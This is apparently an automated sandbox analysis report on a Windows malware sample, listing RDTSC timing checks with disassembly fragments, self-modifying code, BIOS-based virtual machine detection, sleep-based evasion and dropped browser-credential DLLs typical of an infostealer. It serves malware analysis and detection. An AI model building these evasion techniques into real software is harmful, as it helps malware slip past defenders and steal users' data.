              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 105F2B9 second address: 105F2BF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109ECBF second address: 109ECC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109ECC3 second address: 109ECDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A333h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109ECDA second address: 109ECEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F50492D819Eh 0x0000000c jo 00007F50492D8196h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109ECEE second address: 109ECFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F5048C0A326h 0x0000000c rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109F4ED second address: 109F509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F50492D819Eh 0x0000000e push ebx 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109FDC8 second address: 109FE50 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5048C0A328h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 32B1E728h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F5048C0A328h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d sub edi, dword ptr [ebp+122D390Dh] 0x00000033 call 00007F5048C0A329h 0x00000038 js 00007F5048C0A32Eh 0x0000003e push edi 0x0000003f jc 00007F5048C0A326h 0x00000045 pop edi 0x00000046 push eax 0x00000047 jp 00007F5048C0A33Dh 0x0000004d mov eax, dword ptr [esp+04h] 0x00000051 jmp 00007F5048C0A32Dh 0x00000056 mov eax, dword ptr [eax] 0x00000058 push eax 0x00000059 push edx 0x0000005a jnl 00007F5048C0A328h 0x00000060 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109FE50 second address: 109FE5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F50492D819Ah 0x00000009 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109FE5E second address: 109FE62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 109FE62 second address: 109FE77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push ecx 0x0000000d jc 00007F50492D819Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10A0154 second address: 10A015A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10A015A second address: 10A015F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10A015F second address: 10A017D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5048C0A332h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10A04CA second address: 10A04CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10A0A36 second address: 10A0A98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 jmp 00007F5048C0A32Bh 0x0000000b jmp 00007F5048C0A32Ah 0x00000010 popad 0x00000011 xchg eax, ebx 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F5048C0A328h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c jmp 00007F5048C0A335h 0x00000031 movsx esi, si 0x00000034 nop 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 push esi 0x00000039 pop esi 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10A0A98 second address: 10A0A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10A0A9D second address: 10A0AB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F5048C0A326h 0x00000009 ja 00007F5048C0A326h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edi 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10A0D09 second address: 10A0D0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10A0E97 second address: 10A0E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10A0F7C second address: 10A0F82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10A20A7 second address: 10A20AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10A1F14 second address: 10A1F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10A1F18 second address: 10A1F31 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5048C0A326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5048C0A32Dh 0x00000011 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10A3B88 second address: 10A3BB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D81A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F50492D819Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10A3BB1 second address: 10A3BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10A3BB5 second address: 10A3C2F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007F50492D8196h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F50492D8198h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007F50492D8198h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 00000018h 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 push 00000000h 0x00000045 mov edi, dword ptr [ebp+122D37A1h] 0x0000004b xchg eax, ebx 0x0000004c push ecx 0x0000004d push eax 0x0000004e je 00007F50492D8196h 0x00000054 pop eax 0x00000055 pop ecx 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F50492D81A0h 0x0000005e rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10A595A second address: 10A595E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10A6438 second address: 10A643E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10A3914 second address: 10A3918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10A3918 second address: 10A391E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10ABC58 second address: 10ABC5D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10ADC2A second address: 10ADC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10B0D94 second address: 10B0DAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F5048C0A328h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 jo 00007F5048C0A343h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10627FC second address: 1062809 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 1062809 second address: 1062811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10B771A second address: 10B771E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10B86F5 second address: 10B8706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5048C0A32Ch 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10B967A second address: 10B9698 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F50492D819Bh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jno 00007F50492D8196h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10B9698 second address: 10B969D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10BB553 second address: 10BB558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10BB558 second address: 10BB562 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5048C0A32Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10A56BB second address: 10A56BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10A6BF7 second address: 10A6C10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10ADEE9 second address: 10ADEED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10AEF47 second address: 10AEF4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10AEF4D second address: 10AEF51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10AEF51 second address: 10AEF72 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5048C0A326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5048C0A330h 0x00000016 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10AEF72 second address: 10AEF78 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10AEF78 second address: 10AEF7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10AEF7E second address: 10AEFEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a jmp 00007F50492D819Ah 0x0000000f sub dword ptr [ebp+122D1EA3h], esi 0x00000015 popad 0x00000016 sub di, 4B00h 0x0000001b push dword ptr fs:[00000000h] 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007F50492D8198h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 sub edi, 3FA1A900h 0x00000049 movzx ebx, di 0x0000004c mov eax, dword ptr [ebp+122D0241h] 0x00000052 add di, 219Ch 0x00000057 push FFFFFFFFh 0x00000059 movsx ebx, bx 0x0000005c nop 0x0000005d push eax 0x0000005e push edx 0x0000005f jc 00007F50492D8198h 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10AEFEF second address: 10AF002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c jg 00007F5048C0A326h 0x00000012 pop ebx 0x00000013 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10AFF48 second address: 10AFF4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10B2119 second address: 10B2124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5048C0A326h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10B2124 second address: 10B2138 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F50492D819Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10B682D second address: 10B6831 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10B78F4 second address: 10B7981 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jno 00007F50492D8196h 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007F50492D81A8h 0x00000016 jmp 00007F50492D819Ah 0x0000001b popad 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007F50492D8198h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 or dword ptr [ebp+122D2C68h], edi 0x0000003d push dword ptr fs:[00000000h] 0x00000044 mov dword ptr fs:[00000000h], esp 0x0000004b mov ebx, ecx 0x0000004d sub dword ptr [ebp+1247D94Eh], ecx 0x00000053 mov eax, dword ptr [ebp+122D06F9h] 0x00000059 or dword ptr [ebp+122D2C99h], ebx 0x0000005f push FFFFFFFFh 0x00000061 mov edi, dword ptr [ebp+122D3935h] 0x00000067 push eax 0x00000068 push edi 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10B68CC second address: 10B68F0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5048C0A32Bh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jo 00007F5048C0A32Ch 0x00000014 jnc 00007F5048C0A326h 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeRDTSC instruction interceptor: First address: 10B97E3 second address: 10B98A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D819Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F50492D81A0h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F50492D8198h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push dword ptr fs:[00000000h] 0x00000032 mov dword ptr [ebp+122D325Ch], eax 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f jng 00007F50492D8198h 0x00000045 mov bl, al 0x00000047 adc di, 5840h 0x0000004c mov eax, dword ptr [ebp+122D1219h] 0x00000052 jmp 00007F50492D81A8h 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push eax 0x0000005c call 00007F50492D8198h 0x00000061 pop eax 0x00000062 mov dword ptr [esp+04h], eax 0x00000066 add dword ptr [esp+04h], 00000019h 0x0000006e inc eax 0x0000006f push eax 0x00000070 ret 0x00000071 pop eax 0x00000072 ret 0x00000073 nop 0x00000074 jc 00007F50492D81A8h 0x0000007a jmp 00007F50492D81A2h 0x0000007f push eax 0x00000080 pushad 0x00000081 push eax 0x00000082 push edx 0x00000083 pushad 0x00000084 popad 0x00000085 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSpecial instruction interceptor: First address: D9FB6E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSpecial instruction interceptor: First address: D9FAB3 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSpecial instruction interceptor: First address: F423E0 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSpecial instruction interceptor: First address: D9D646 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSpecial instruction interceptor: First address: F51D2E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeSpecial instruction interceptor: First address: FD1FFF instructions caused by: Self-modifying code
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSpecial instruction interceptor: First address: EEEB2E instructions caused by: Self-modifying code
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSpecial instruction interceptor: First address: EEEC06 instructions caused by: Self-modifying code
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSpecial instruction interceptor: First address: 109AA05 instructions caused by: Self-modifying code
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSpecial instruction interceptor: First address: 10BDC09 instructions caused by: Self-modifying code
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSpecial instruction interceptor: First address: 11247CA instructions caused by: Self-modifying code
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeSpecial instruction interceptor: First address: 1098E93 instructions caused by: Self-modifying code
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 33EB2E instructions caused by: Self-modifying code
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 33EC06 instructions caused by: Self-modifying code
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 4EAA05 instructions caused by: Self-modifying code
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 50DC09 instructions caused by: Self-modifying code
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 5747CA instructions caused by: Self-modifying code
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 4E8E93 instructions caused by: Self-modifying code
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
              Source: C:\Users\user\Desktop\E89hSGjVrv.exe TID: 5428Thread sleep time: -32016s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exe TID: 1412Thread sleep time: -60030s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exe TID: 6548Thread sleep time: -46023s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exe TID: 6648Thread sleep time: -60030s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exe TID: 5024Thread sleep time: -40020s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5448Thread sleep count: 53 > 30
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5448Thread sleep time: -1590000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5448Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
              Source: C:\Users\user\DocumentsCAFHDBGHJK.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000
              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
